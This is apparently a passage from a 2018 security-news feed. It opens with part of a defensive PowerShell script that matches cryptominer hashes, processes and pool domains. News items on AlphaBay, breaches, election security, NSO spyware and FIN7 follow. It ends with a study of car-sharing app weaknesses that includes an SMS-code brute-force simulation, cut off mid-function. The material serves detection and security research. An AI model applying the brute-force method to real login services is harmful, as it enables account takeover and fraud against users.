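        Get-FileHash -Algorithm MD5 -ErrorAction SilentlyContinue |
        Where-Object { $_.Hash -in $md5s } |
        Select-Object Hash, Path
}

function Find-MinerProcess {
    # Miners usually receive the pool and wallet on the command line
    Get-CimInstance -ClassName Win32_Process |
        Where-Object { $_.CommandLine -and ($_.CommandLine -match $pattern) } |
        Select-Object ProcessId, Name, CommandLine
}

# Constructed sample log lines (hosts 10.0.0.x are fictional)
$sampleLogs = @(
    '2018-07-30 09:12:01 10.0.0.15 query A update.7h4uk.com',
    '2018-07-30 09:12:03 10.0.0.15 CONNECT 185.128.43.62:443',
    '2018-07-30 09:13:10 10.0.0.22 query A www.example.com',
    '2018-07-30 09:14:45 10.0.0.15 query A xmr.nanopool.org'
)

Find-IocInLogs -LogLines $sampleLogs | Format-Table -AutoSize
# Live checks, run on the host under investigation:
# Find-IocHashes -Path 'C:\Users'
# Find-MinerProcess
```

On the sample lines the first, second and fourth are reported, each with the indicator that fired. Matching the pool domains as substrings deliberately catches any subdomain, which will also flag legitimate mining on a host where that is permitted; the wallet addresses are the more specific signal, because they identify this campaign's payout rather than the pool.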


Darknet Market Spokesman Gets Nearly 4 Years in Prison
2.8.2018 securityweek Crime

ATLANTA (AP) — A man who promoted an international criminal online marketplace and assisted people using it for illicit transactions was sentenced Tuesday in Atlanta to serve nearly four years in federal prison.

Ronald L. Wheeler III of Streamwood, Illinois, worked for about two years as a public relations specialist for AlphaBay, which authorities have said was the world's leading "darknet" marketplace when an international law enforcement effort shut it down in July 2017.

Wheeler pleaded guilty in March to a charge of conspiracy to commit access device fraud. Prosecutors said he worked with others to steal personal information — including passwords, email addresses and bank account numbers — to obtain money, goods and services.

U.S. District Judge Leigh May sentenced Wheeler, 25, to spend three years and 10 months in prison, followed by three years of supervised release. As part of a plea deal reached with prosecutors, Wheeler also agreed to forfeit $27,562 in cash found in his home and 13.97 bitcoins, which are currently worth a total of more than $100,000.

Wheeler apologized to the judge and told her he has worked hard since he was caught to get himself on the right path — getting a legitimate job, paying taxes and kicking a drug addiction.

"As I move forward, I hope to be able to do right by this country and the world," he said.

May said Wheeler's crime was extremely serious, but she imposed the relatively light sentence agreed to by the two sides in part because of the effort he'd made.

"You're doing what you need to do to show me you've learned from this," she said.

Known online as Trappy and Trappy_Pandora, Wheeler began working for AlphaBay in May 2015. His duties included moderating the AlphaBay forum on Reddit and posting information about AlphaBay in other Reddit forums, mediating sales disputes among the marketplace's users, providing nontechnical assistance to users and promoting AlphaBay online, prosecutors have said.

Wheeler's lawyer, Phillip Turner, described his client as a "very misguided young man who came from a situation where he lacked self-esteem and got on the wrong path." Having a title bestowed upon him by AlphaBay made him feel important and gave him a sense of belonging, Turner said in court.

Prosecutor Samir Kaushal told the judge Wheeler was completely aware he was involved in illegal activity and encouraged lawlessness in others. Given the scope of the illegal activity enabled by AlphaBay — including the sale of personal financial information and dangerous drugs — Wheeler could have been charged with much more serious crimes that would have carried a much heftier sentence.

"This is a very good outcome for him," Kaushal said.

The only reason prosecutors recommended a lower sentence is because when he was caught, he immediately admitted his guilt and began cooperating with the government, Kaushal said.

Wheeler was paid a salary in bitcoin, a digital currency, by Alexandre Cazes, the 25-year-old Canadian owner of AlphaBay who was known online as Alpha02 and Admin, according to a court filing.

AlphaBay used Tor, a network of thousands of computers run by volunteers, to hide its tracks. With Tor, traffic gets relayed through multiple computers, with identifying information stripped at each stop so no single computer knows the full chain.

The court filing says Wheeler's work with AlphaBay ended July 3, 2017. Two days later, Cazes was arrested in Thailand with DEA and FBI assistance, resulting in AlphaBay going offline. Cazes died in Thai police custody on July 12, 2017. The country's narcotics police chief told reporters at the time that Cazes hanged himself in jail just before a scheduled court hearing.

The police agency Europol estimates AlphaBay had done $1 billion in business since its 2014 creation. Cazes had amassed a $23 million fortune as the site's creator and administrator, according to court records.


Dixons Carphone Breach: Much Larger Than First Thought
2.8.2018 securityweek Incident

A data breach at Dixons Carphone that was made public last month resulted in 10 million records being accessed by unknown actors, the UK consumer electronics retailer announced Tuesday.

The company initially said that only 1.2 million records containing personal data of its customers, such as name, address or email address, were accessed during the intrusion. It also claimed that the accessed data did not include financial information.

In an update released this week (PDF), the company revealed that hackers were able to access approximately 10 million records containing personal data. The incident happened last year, but no specific details on when or how the intrusion took place were provided.

Although it initially said that the attackers were attempting to access 5.9 million cards and that 105,000 non-EU issued payment cards were indeed compromised, the company now says that the impacted records did not contain payment card details.

“While there is now evidence that some of this data may have left our systems, these records do not contain payment card or bank account details and there is no evidence that any fraud has resulted. We are continuing to keep the relevant authorities updated,” Dixons Carphone said.

The company also announced that it has decided to inform all of its customers of the data breach. The retailer says this is only a precaution; it is apologizing to customers and advising them of the protective steps they can take to minimize the risk of fraud.

“As we indicated previously, we have taken action to close off this access and have no evidence it is continuing,” the company said.


Yale University Discloses Decade-Old Data Breach
2.8.2018 securityweek Incident

"Because the intrusion happened nearly ten years ago, we do not have much more information about how it occurred."

Yale University revealed that hackers breached one of its databases between 2008 and 2009 and accessed the personal information of 119,000 people.

The intrusion happened between April 2008 and January 2009 and apparently affected a single database stored on a Yale server. The data breach was discovered on June 16, 2018, during a security review. The attackers extracted names, Social Security numbers, and, in almost all cases, dates of birth. In many cases, Yale email addresses were also extracted, and in some cases the physical addresses of individuals associated with the university were compromised as well.

According to Yale, no financial information was stored in the database and almost all people impacted by the breach were affiliated with the university.

“In 2011, Yale IT deleted the personal information in the database as part of an effort to eliminate unneeded personal information on Yale servers, but the intrusion was not detected at that time,” the university says.

Last week, Yale sent notices of the data breach to impacted members of the Yale community, including alumni/ae, faculty members, and staff members. The university says notices were sent to nearly 97% of the individuals affected, but that it has yet to acquire a verified current address for the remaining 3%.

In a letter (PDF) to the State of New Hampshire Attorney General, Yale also revealed that the same server was hacked a second time between March 2016 and June 2018. The intrusion resulted in the compromise of the names and Social Security numbers of 33 individuals, none of whom reside in New Hampshire.

Yale claims that there is no indication that the compromised information has been misused. However, it decided to offer identity monitoring services at no cost, to help users guard against identity theft.

Because the intrusion occurred a decade ago, there is no information on how the attackers hacked the server. Yale also says that “it is not feasible to determine the identities of the perpetrators.”


Trump Criticized for Not Leading Effort to Secure Elections
2.8.2018 securityweek BigBrothers

WASHINGTON (AP) — As alarms blare about Russian interference in U.S. elections, the Trump administration is facing criticism that it has no clear national strategy to protect the country during the upcoming midterms and beyond.

Both Republicans and Democrats have criticized the administration's response as fragmented, without enough coordination across federal agencies. And with the midterms just three months away, critics are calling on President Donald Trump to take a stronger stand on an issue critical to American democracy.

"There's clearly not enough leadership from the top. This is a moment to move," said Maryland Sen. Chris Van Hollen, head of the Democratic Senatorial Campaign Committee. "I don't think they are doing nearly enough."

Various government agencies have been at work to ensure safe voting. The FBI has set up a Foreign Influence Task Force and intelligence agencies are collecting information on Russian aggression.

But Trump himself rarely talks about the issue. And in the nearly two years since Russians were found to have hacked into U.S. election systems and manipulated social media to influence public opinion, the White House has held two meetings on election security.

One was last week. It ran 30 minutes.

The meeting resulted in no new presidential directive to coordinate the federal effort to secure the election, said Suzanne Spaulding, former undersecretary of homeland security who was responsible for cyber security and protecting critical infrastructure.

"Trump's failure to take a leadership role on this, up until this (National Security Council) meeting, misses an opportunity to send a clear message to states that this is a very serious threat," Spaulding said. "We did not get out of this NSC meeting a comprehensive, interagency strategy. It was each department and agency working in their silos."

Garrett Marquis, a spokesman for the NSC, said the government response is robust. He said NSC staff "leads the regular and continuous coordination of the whole-of-government approach to addressing foreign malign influence and ensuring election security."

At a cybersecurity summit on Tuesday, Vice President Mike Pence said he was confident officials could prevent further meddling by foreign agents.

"We will repel any efforts to interfere in our elections," he said.

Republican Sen. Lindsey Graham of South Carolina said government agencies are "doing a lot of good work, but nobody knows about it." He lamented Trump's contradictory statements about whether he accepts the U.S. intelligence assessment that Russia meddled in the 2016 presidential election.

"What I think he needs to do is lead this nation to make sure the 2018 election is protected," Graham said recently on CBS' "Face the Nation." "He needs to be the leader of the movement — not brought to the dance reluctantly. So, I hope he will direct his government, working with Congress, to harden the 2018 election before it's too late."

The debate over safeguarding U.S. elections comes as evidence of cyber threats piles up. Facebook announced Tuesday that it has uncovered "sophisticated" efforts, possibly linked to Russia, to influence U.S. politics on its platforms.

The company said it removed 32 accounts from Facebook and Instagram because they were involved in "coordinated" political behavior and appeared to be fake. Nearly 300,000 people followed at least one of the accounts.

Earlier this month, Microsoft said it discovered that a fake domain had been set up as the landing page for phishing attacks by a hacking group believed to have links to Russian intelligence. A Microsoft spokesman said Monday that additional analysis has confirmed that the attempted attacks occurred in late 2017 and targeted multiple accounts associated with the offices of two legislators running for re-election. Microsoft did not name the lawmakers.

Sen. Claire McCaskill, D-Mo., has said Russian hackers tried unsuccessfully to infiltrate her Senate computer network in 2017.

Sen. Jeanne Shaheen, D-N.H., who is not running for re-election, told The Associated Press on Monday that someone contacted her office "claiming to be an official from a country."

A frequent critic of Russia, Shaheen said she didn't know if Moscow was behind the email received in November but had turned the matter over to the FBI.

Shaheen said another senator had been targeted besides McCaskill. "It's my understanding that there is, but I don't want to speak for other senators," she said. When asked if it was a Democratic senator, Shaheen nodded yes.

"People on both sides of the aisle have been beating the drum for two years now about the need for somebody to be accountable for cybersecurity across the government," Shaheen said.

National Intelligence Director Dan Coats said U.S. intelligence officials continue to see activity from individuals affiliated with the Internet Research Agency, whose members were indicted by U.S. special counsel Robert Mueller. Coats said they create new social media accounts disguised as those of Americans, then use the fake accounts to drive attention to divisive issues in America.

In the Obama administration, synchronizing federal agencies' work on election security would have likely been the job of the White House cybersecurity coordinator. Trump's national security adviser, John Bolton, abolished the post in May to remove a layer of bureaucracy from the NSC flow chart.

Under the current structure, the point man for election security is Rear Adm. Douglas Fears. Trump tapped Fears in early June as his deputy assistant to the president and homeland security and counterterrorism adviser.

Fears oversees the election security and other portfolios of the NSC's Cybersecurity Directorate and coordinates the federal government's response to disasters.

Homeland Security Secretary Kirstjen Nielsen says cyber threats are "an urgent, evolving crisis."

"Our adversaries' capabilities online are outpacing our stove-piped defenses," Nielsen said Tuesday. "In fact, I believe that cyber threats collectively now exceed the danger of physical attacks against us. This is a major sea change for my department and for our country's security."


FireEye MalwareGuard Uses Machine Learning to Detect Malware
2.8.2018 securityweek Virus

FireEye on Tuesday announced the launch of MalwareGuard, an engine that leverages machine learning (ML) to detect malware and prevent it from executing.

MalwareGuard has been added to FireEye’s Endpoint Security product and the firm will also be deploying the new engine to its Network Security and Email Security solutions.

The engine is designed to predict whether a Windows executable file is malicious, prior to its execution. MalwareGuard should be able to detect both known malware and zero-day threats, FireEye said.

MalwareGuard is based on two years of research conducted by the company, which included assembling a dataset of more than 300 million samples and using it to train the engine. During its internal evaluation, which involved testing in real-world incident response cases, FireEye made predictions on over 20 million executable files.

“During the internal evaluation period, we also developed the infrastructure to support long-term tracking and maintenance for MalwareGuard,” FireEye said in a blog post. “Our goal was and is to have real-time visibility into the model’s performance, with the expectation that model retraining could be done on demand when performance dips below a threshold. To meet this objective, we developed data pipelines for each phase of the ML process, which makes the system fully automatable.”

The company’s blog post includes details on the goals, development, and testing of MalwareGuard.

In addition to MalwareGuard, FireEye informed customers that its Endpoint Security solution now includes new features designed to provide improved management capabilities and enable organizations to rapidly respond to important alerts.

MalwareGuard and the other new features have been added to the latest version of FireEye Endpoint Security, specifically version 4.5.


Leaked Chats Show Alleged Russian Spy Seeking Hacking Tools
2.8.2018 securityweek BigBrothers

MOSCOW (AP) — Six years ago, a Russian-speaking cybersecurity researcher received an unsolicited email from Kate S. Milton.

Milton claimed to work for the Moscow-based anti-virus firm Kaspersky. In an exchange that began in halting English and quickly switched to Russian, Milton said she was impressed by the researcher's work on exploits — the digital lock picks used by hackers to break into vulnerable systems — and wanted to be copied in on any new ones that the researcher came across.

"You almost always have all the top-end exploits," Milton said, after complimenting the researcher about a post to her website, where she often dissected malicious software.

"So that our contact isn't one-sided, I'd offer you my help analyzing malicious viruses, and as I get new samples I'll share," Milton continued. "What do you think?"

The researcher — who works as a security engineer and runs the malware-sharing site on the side — always had a pretty good idea that Milton wasn't who she said she was. Last month, she got confirmation via an FBI indictment.

The indictment, made public on July 13, lifted the lid on the Russian hacking operation that targeted the 2016 U.S. presidential election. It identified "Kate S. Milton" as an alias for military intelligence officer Ivan Yermakov, one of 12 Russian spies accused of breaking into the Democratic National Committee and publishing its emails in an attempt to influence the 2016 election.

The researcher, who gave her exchanges with Milton to The Associated Press on condition of anonymity, said she wasn't pleased to learn she had been corresponding with an alleged Russian spy. But she wasn't particularly surprised either.

"This area of research is a magnet for suspicious people," she said.

The researcher and Milton engaged in a handful of conversations between April 2011 and March 2012. But even their sparse exchanges, along with a few digital breadcrumbs left behind by Yermakov and his colleagues, offer insight into the men behind the keyboards at Russia's Main Intelligence Directorate, or GRU.

It isn't unusual for messages like Milton's to come in out of the blue, especially in the relatively small world of independent malware analysts.

"There was nothing particularly unusual in her approach," the researcher said. "I had very similar interactions with amateur and professional researchers from different countries."

The pair corresponded for a while. Milton shared a piece of malicious code at one point and sent over a hacking-related YouTube video at another, but contact fizzled out after a few months.

Then, the following year, Milton got back in touch.

"It's been all work, work, work," Milton said by way of apology, before quickly getting to the point. She needed new lock picks.

"I know that you can help," she wrote. "I'm working on a new project and I really need contacts that can provide information or have contacts with people who have new exploits. I am willing to pay for them."

In particular, Milton said she wanted information on a recently disclosed vulnerability identified as CVE-2012-0002, a critical Microsoft flaw that could allow hackers to remotely compromise some Windows computers. Milton had heard that someone had already cobbled together a working exploit.

"I'd like to get it," she said.

The researcher demurred. The trade in exploits — for use by spies, cops, surveillance companies or criminals — can be a seedy one.

"I usually steer clear from any wannabe buyers and sellers," she told the AP.

She politely declined - and never heard from Milton again.

Milton's Twitter account — whose profile photo features "Lost" star Evangeline Lilly — is long dormant. The last few messages carry urgent, awkwardly worded appeals for exploits or tips about vulnerabilities.

"Help me find detailed description CVE-2011-0978," one message reads, referring to a bug in PHP, a coding language often used for websites. "Need a work exploit," the message continues, ending with a smiley face.

It isn't clear whether Yermakov was working for the GRU when he first masqueraded as Kate S. Milton. Milton's Twitter silence — starting in 2011 — and the reference to a "new project" in 2012 might hint at a new job.

In any case, Yermakov wasn't working for the anti-virus firm Kaspersky — not then and not ever, the company said in a statement.

"We don't know why he allegedly presented himself as an employee," the statement said.

Messages sent by the AP to Kate S. Milton's Gmail account were not returned.

The exchanges between Milton (Yermakov) and the researcher could be read in different ways.

They might show that the GRU was trying to cultivate people in the information security community with an eye toward getting the latest exploits as soon as possible, said Cosimo Mortola, a threat intelligence analyst at the cybersecurity company FireEye.

It's also possible that Yermakov might have initially worked as an independent hacker, hustling for spy tools before being hired by Russian military intelligence — a theory that makes sense to defense and foreign policy analyst Pavel Felgenhauer.

"For cyber, you have to hire boys that understand computers and everything the old spies at the GRU don't understand," Felgenhauer said. "You find a good hacker, you recruit him and give him some training and a rank — a lieutenant or something — and then he will do the same stuff."

The leak of Milton's conversations shows how the glare of publicity is revealing elements of the hackers' methods — and perhaps even hints about their private lives.

It's possible, for example, that Yermakov and many of his colleagues commute to work through the arched entrance to Komsomolsky 22, a military base in the heart of Moscow that serves as home to the alleged hacker's Unit 26165. Photos shot from inside show it's a well-kept facility, with a czarist-era facade, manicured lawns, flower beds and shady trees in a central courtyard.

The AP and others have tried to trace the men's digital lives, finding references to some of those indicted by the FBI in academic papers on computing and mathematics, on Russian cybersecurity conference attendee lists or — in the case of Cpt. Nikolay Kozachek, nicknamed "kazak" — written into the malicious code created by Fancy Bear, the nickname long applied to the hacking squad before their identities were allegedly revealed by the FBI.

One of Kozachek's other nicknames also appears on a website that allowed users to mine tokens for new weapons to use in the first-person shooter videogame "Counter Strike: Global Offensive" — providing a flavor of the hackers' extracurricular interests.

The AP has also uncovered several social media profiles tied to another of Yermakov's indicted colleagues — Lt. Aleksey Lukashev, allegedly the man behind the successful phishing of the email account belonging to Hillary Clinton's campaign chairman, John Podesta.

Lukashev operated a Twitter account under the alias "Den Katenberg," according to an analysis of the indictment as well as data supplied by the cybersecurity firm Secureworks and Twitter's "Find My Friends" feature.

A tipster using the Russian facial recognition search engine FindFace recently pointed the AP to a VKontakte account that, while using a different name, appears active and features photos of the same young, Slavic-looking man.

Many of his posts and his friends appear to originate from a district outside Moscow known as Voskresensky. The photos show him cross-country skiing at night, wading in emerald waters somewhere warm and visiting Yaroslavl, an ancient city northwest of Moscow. One video appeared to show Russia's 2017 Spasskaya Tower Festival, a military music festival popular with officers.

The AP could not establish with certainty that the man on the VKontakte account is Lukashev. Several people listed as friends either declined to comment when approached by the AP or said Lukashev's name was unknown to them.

Shortly thereafter, the profile's owner locked down his account, making his vacation snaps invisible to outsiders.

The exchanges between the cybersecurity researcher and Kate S. Milton are available here.


The Disconnect Between Understanding Email Threats and Preventing Them
2.8.2018 securityweek
Spam

Email continues to be the starting point for the majority of all security breaches. The 2018 Verizon Data Breaches Investigation Report (DBIR) says that email is the attack vector in 96% of breaches. But a new study suggests that despite these figures, companies are not allocating sufficient resources to reduce email risk.

The study (PDF) was conducted by the Ponemon Institute for Valimail, an email security automation firm. Ponemon surveyed 650 IT and IT security professionals who have a role in securing email applications and/or protecting end-users from email threats. It found, according to Ponemon, a "disconnect between concerns about email threats and fraud and the lack of action taken by companies represented in this study."

Findings suggest that 80% of respondents are very concerned about their ability to counter the email threat, but only 29% are taking significant steps to counter the threat. The greatest concerns are that hackers might spoof their email domain "to hurt the deliverability of legitimate emails" (82%); the overall state of their current email security (80%); and that they could be hacked or infiltrated via a phishing email (69%).

The threat from email phishing, spoofing and impersonation attacks is understood and acknowledged. Seventy-four percent of respondents are concerned about phishing emails directed at employees or executives; 67% about email as a source of fraud against the company (such as BEC attacks); 66% about email as a vector for infiltrating malware and/or exfiltrating data; and 65% about hackers impersonating the company in phishing attacks against others -- that is, other firms and non-employees.

The disconnect comes from the company response to the concerns held by their own professionals. Only 29% of the respondents believe their firm is taking significant steps to prevent phishing attacks and email impersonation, while 21% say they are taking 'no steps' -- despite the DBIR's evidence that email is the source of almost all data breaches.

Only 41% of the respondents say their organization has created a security infrastructure or plan for email -- but of these, almost half say there is no schedule for reviewing its effectiveness (39%), or are unsure of any review schedule (10%). Only 11% of respondents said their organization reviews the effectiveness of its email security plan quarterly.

Part of the problem may be down to the traditional relationship between OT and IT. While email is firmly a part of information technology rather than operational technology, nevertheless it has an operational business function. As such, operational ease and continuity might be receiving a higher priority than security. This is possibly supported by managerial responsibility.

Asked, 'Who within the organization is primarily responsible for the security of email and services/applications that use email?', only 15% of the respondents said it was the CISO/CSO. Twenty-one percent said it was the CIO/CTO, 20% said the line of business management, 9% said the head of messaging services, and 9% said the head of IT Operations. Somewhat surprisingly, the majority of organizations do not have their head of security responsible for the security of emails.

Impersonation attacks are an acknowledged and growing email threat. The top five currently-used technologies to prevent these are anti-spam/phishing filters (63%), secure email gateways (53%), SIEMs (44%), DMARC (39%), and anti-phish training (30%). Use of all of these is expected to grow over the next 12 months: filters by 2%, SEGs by 10%, SIEMs by 3%, DMARC by 9%, and phish training by a colossal 27%.

These figures simply indicate that use of the existing technologies, which have so far failed to stop email being the starting point in 96% of all security breaches, will increase. This doesn't mean, however, that the respondents have abandoned hope in their ability to improve things. Asked what effect a 20% increase in their email security budget would have, the reply was a 45% improvement in the detection rate with a 33% improvement in the prevention rate.

"With the dramatic rise in impersonation attacks as a primary vector for cyberattacks, companies are re-assessing the balance of their security efforts,” said Alexander García-Tobar, CEO and co-founder of Valimail.

“While traditional approaches are good for filtering malicious content and blocking spam, impersonation attacks can only be stopped with email anti-impersonation solutions. Individuals at all levels of a company, including customers and clients, are vulnerable to phishing, fraud, and impersonation attacks. Companies can strengthen their security against email fraud with automated solutions and close that disconnect between email threats and preventive action," he added.

What surprises Ponemon, however, is the current lack of adoption of such automated solutions. "We were surprised to see a vast majority of companies who believe that they have had a breach involving email but are not yet embracing automated anti-impersonation solutions to protect themselves proactively,” said Dr. Larry Ponemon, chairman and founder of Ponemon Institute. “Adopting fully automated solutions for DMARC enforcement that provide email authentication will help companies get ahead of the attackers and build trust with their clients and end users."


Human Rights Group: Employee Targeted With Israeli Spyware
2.8.2018 securityweek
Virus

LONDON (AP) — An Amnesty International employee has been targeted with Israeli-made surveillance software, the human rights group said Wednesday, adding to a growing number of examples of Israeli technology being used to spy on human rights workers and opposition figures in the Middle East and beyond.

In a 20-page report, Amnesty outlined how it thinks a hacker tried to break into an unidentified staff member's smartphone in early June by baiting the employee with a WhatsApp message about a protest in front of the Saudi Embassy in Washington.

The London-based human rights organization said it traced the malicious link in the message to a network of sites tied to the NSO Group, an Israeli surveillance company implicated in a series of digital break-in attempts, including a campaign to compromise proponents of a soda tax in Mexico and an effort to hack into the phone of an Arab dissident that prompted an update to Apple's operating system.

Joshua Franco, Amnesty's head of technology and human rights, said the latest hacking attempt was emblematic of the increased digital risk faced by activists worldwide.

"This is the new normal for human rights defenders," Franco said.

NSO said in a written statement that its product was "intended to be used exclusively for the investigation and prevention of crime and terrorism" and that allegations of wrongdoing would be investigated. In response to a series of written questions, the company said past allegations of customer misuse had, in an undisclosed number of cases, led to the termination of contracts.

Amnesty's findings were corroborated by internet watchdog Citizen Lab, which has been tracking NSO spyware for two years and is based at the University of Toronto's Munk School of Global Affairs.

In its own report being released Wednesday, Citizen Lab said it so far had counted some 175 targets of NSO spyware worldwide, including 150 people in Panama identified as part of a massive domestic espionage scandal swirling around the country's former president.

The Amnesty International report said the organization identified a second human rights activist, in Saudi Arabia, who was targeted in a similar way to its staffer. Citizen Lab said it found traces of similar hacking attempts tied to Qatar or Saudi Arabia, hinting at the use of the Israeli spyware elsewhere in the Gulf.

Any possible use of Israeli technology to police dissent in the Arab world could raise uncomfortable questions both for Israel, which still sees itself as a bastion of democracy in the region, and for countries with no formal diplomatic ties to the Jewish state.

For Amnesty's Franco, it was a sign of an out-of-control trade in high-tech surveillance tools.

"This is a huge market that's completely opaque and under-regulated," he said.


Three Ukrainians Arrested for Hacking Over 100 US Companies
2.8.2018 securityweek Crime

Three Ukrainians have been arrested for hacking more than 100 US companies and stealing millions of customer records, the Department of Justice announced Wednesday.

Dmytro Fedorov, 44, Fedir Hladyr, 33, and Andrii Kolpakov, 30, were members of a "sophisticated international cybercrime group" called "FIN7," the department said in a statement.

"Since at least 2015, FIN7 members engaged in a highly sophisticated malware campaign targeting more than 100 US companies, predominantly in the restaurant, gaming, and hospitality industries," it said.

"FIN7 hacked into thousands of computer systems and stole millions of customer credit and debit card numbers, which the group used or sold for profit," it said.

The Justice Department said members of the "prolific hacking group" also targeted computer networks in Britain, Australia, and France.

FBI special agent Jay Tabb told a press conference in Seattle, Washington, where the arrests were announced, that the hacking was not state-sponsored.

"No linkage at all to any state-sponsored activity," Tabb said. "This is just old-fashioned organized crime."

Fedorov, a "high-level hacker and manager," was arrested in Bielsko-Biala, Poland, in January and is being detained pending extradition to the United States, the Department of Justice said.

Hladyr, FIN7's systems administrator, was arrested in Dresden, Germany, in January, it said, and is being held in Seattle, Washington, pending a trial scheduled to open on October 22.

Kolpakov, described as a "supervisor of a group of hackers," was arrested in Lepe, Spain, in late June and is being detained there pending a US extradition request, the department said.

- Chipotle, Arby's targeted -

"Cyber criminals who believe that they can hide in faraway countries and operate from behind keyboards without getting caught are just plain wrong," said Annette Hayes, US Attorney for the Western District of Washington.

The charges against the three were contained in federal indictments unsealed on Wednesday.

They were charged with 26 counts of conspiracy, wire fraud, computer hacking, access device fraud, and aggravated identity theft.

The Justice Department said that FIN7 also known as the "Carbanak Group" and the "Navigator Group," breached computer networks of companies in 47 US states and Washington DC.

They allegedly stole "more than 15 million customer card records from over 6,500 individual point-of-sale terminals at more than 3,600 separate business locations."

Among the companies which have publicly disclosed hacks by FIN7 are Chipotle Mexican Grill, Chili's, Arby's, Red Robin and Jason's Deli, the Justice Department said.

Many of the businesses were targeted through phishing schemes involving email.

"FIN7 carefully crafted email messages that would appear legitimate to a business' employee, and accompanied emails with telephone calls intended to further legitimize the email," it said.

Once an attached file was opened, it would trigger malware to steal payment card data which was sold on online underground marketplaces.


A study of car sharing apps
2.8.2018 Kaspersky  Mobil

The growing popularity of car sharing services has led some experts to predict an end to private car ownership in big cities. The statistics appear to back up this claim: for example, in 2017 Moscow saw the car sharing fleet, the number of active users and the number of trips they made almost double. This is great news, but information security specialists have started raising some pertinent questions: how are the users of these services protected and what potential risks do they face in the event of unauthorized access to their accounts?

Why is car sharing of interest to criminals?
The simple answer would be because they want to drive a nice car at somebody else’s expense. However, doing so more than once is likely to be problematic – once the account’s owner finds out they have been charged for a car they never rented, they’ll most likely contact the service’s support line, the service provider will check the trip details, and may eventually end up reporting the matter to the police. It means anyone trying it a second time will be tracked and caught red-handed. This is obvious and makes this particular scenario the least likely reason for hijacking somebody’s account.

The selling of hijacked accounts appears to be a more viable reason. There is bound to be demand from those who don’t have a driving license or those who were refused registration by the car sharing service’s security team. Indeed, offers of this nature already exist on the market.

Criminals offer hijacked accounts from a wide range of car sharing services…

…and explain why you are better off using somebody else’s account

In addition, someone who knows the details of a user’s car sharing account can track all their trips and steal things that are left behind in the car. And, of course, a car that is fraudulently rented in somebody else’s name can always be driven to some remote place and cannibalized for spare parts.

Application security
So, we know there is potential interest among criminal elements; now let’s see if the developers of car sharing apps have reacted to it. Have they thought about user security and protected their software from unauthorized access? We tested 13 mobile apps and (spoiler alert!) the results were not very encouraging.

We started by checking the apps’ ability to prevent launches on Android devices with root privileges, and assessed how well the apps’ code is obfuscated. This was done for two reasons:

the vast majority of Android applications can be decompiled, their code modified (e.g. so that user credentials are sent to a C&C), then re-assembled, signed with a new certificate and uploaded again to an app store;
an attacker on a rooted device can infiltrate the process of the necessary application and gain access to authentication data.
Another important security element is the ability to choose a username and password when using a service. Many services use a person’s phone number as their username. This is quite easy for cybercriminals to obtain as users often forget to hide it on social media, while car sharing users can be identified on social media by their hashtags and photos.

An example of how a social media post can give you away

We then looked at how the apps work with certificates and if cybercriminals have any chance of launching successful MITM attacks. We also checked how easy it is to overlay an application’s interface with a fake authorization window.

Reverse engineering and superuser privileges
Of all the applications we analyzed, only one was capable of countering reverse engineering. It was protected with the help of DexGuard, a solution whose developers also promise that protected software will not launch on a device where the owner has gained root privileges or that has been modified (patched).

File names in the installation package indicate the use of DexGuard

However, while that application is well protected against reverse engineering, there’s nothing to stop it from launching on an Android device with superuser privileges. When tested that way, the app launches successfully and goes through the server authorization process. An attacker could obtain the data located in protected storage. However, in this particular app the data was encrypted quite reliably.

Example of user’s encrypted credentials

Password strength
Half the applications we tested do not allow the user to create their own credentials; instead they force the user to use their phone number and a PIN code sent in a text message. On the one hand, this means the user can’t set a weak password like ‘1234’; on the other hand, it presents an opportunity for an attacker to obtain the password, either by intercepting the SMS (for example via weaknesses in the SS7 signalling network) or by getting the phone’s SIM card reissued in the victim’s name (a SIM swap). We decided to use our own accounts to see how easy it is to find out the ‘password’.

If an attacker finds a person’s phone number on social media and tries to use it to log in to the app, the owner will receive an SMS with a validation code:

As we can see, the validation code is just four digits long, which means it takes at most 10,000 attempts to guess it – not such a large number. Ideally, such codes should be at least six digits long and contain upper and lower case characters as well as numbers; more importantly, the server must cap the number of attempts per code, because a longer code that can be guessed without limit only delays the attacker.

Another car sharing service sends stronger passwords to users; however, there is a drawback to that as well. Its codes are created following a single template: they always have numbers in first and last place and four lower-case Latin characters in the middle:

That means there are about 45.7 million possible combinations (10 × 26⁴ × 10) to search through; if the positioning of the numbers were not restricted, the number of combinations would rise to nearly 2.2 billion (36⁶). Of course, 45,000,000 is also a large amount, but the app enforces neither a delay nor an attempt limit between tries, so there is nothing to prevent brute forcing.

Now, let’s return to the PIN codes of the first application. The app gives users a minute to enter the PIN; if that isn’t enough time, users have to request a new code. It turned out that the combination lifetime is a little over two minutes. We wrote a small brute force utility, reproduced part of the app/server communication protocol and started the brute force. We have to admit that we were unable to brute force the code, and there are two possible reasons for that. Firstly, our internet line may have been inadequate, or secondly, the car sharing operator set an appropriate two-minute timeout for the PIN code, so it couldn’t be brute forced within two minutes even with an excellent internet connection. We decided not to continue, confirming only that the service remained responsive and an attack could be continued after several attempts at sending 10,000 requests at a time.

While doing so, we deliberately started the brute force in a single thread from a single IP address, thereby giving the service a chance to detect and block the attack, contact the potential victim and, as a last resort, deactivate the account. But none of these things happened. We decided to leave it at that and moved on to testing the next application.

We tried all the above procedures on the second app, with the sole exception that we didn’t register a successful brute force of the password. We decided that if the server allows 1,000 combinations to be checked, it would probably also allow 45 million combinations to be checked, so it is just a matter of time.

The server continues to respond after 1,000 attempts to brute force the password

This is a long process with a predictable result. This application also stores the username and password locally in an encrypted format, but if the attacker knows their format, brute forcing will only take a couple of minutes – most of this time will be spent on generating the password/MD5 hash pair (the password is hashed with MD5 and written in a file on the device).
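To make the arithmetic above concrete, here is an added example (written for this article; it is neither the utility the authors built nor any operator's server code) that models SMS-code login on the server side and runs a brute force against it twice: once against a server that, like the first app, accepts unlimited guesses within the code's lifetime, and once against a variant that caps attempts per code. The code length, the roughly two-minute lifetime and the attempt cap of five are assumptions taken from or added to the text; the phone number is a placeholder.

```python
"""SMS-code login: brute force against an unlimited server versus one that
caps attempts per code.

Added example written for this article; not the authors' brute force utility
and not any operator's implementation. PIN_DIGITS and CODE_LIFETIME_S follow
the measurements described in the text, MAX_ATTEMPTS is an assumed cap.
"""
import hmac
import secrets

PIN_DIGITS = 4            # the first app's four-digit SMS code
CODE_LIFETIME_S = 120.0   # the "little over two minutes" measured in the article
MAX_ATTEMPTS = 5          # assumed cap for the hardened variant


def pin_keyspace(digits: int = PIN_DIGITS) -> int:
    return 10 ** digits


def template_keyspace() -> int:
    """Second app's template: digit, four lower-case Latin letters, digit."""
    return 10 * 26 ** 4 * 10


def unrestricted_keyspace() -> int:
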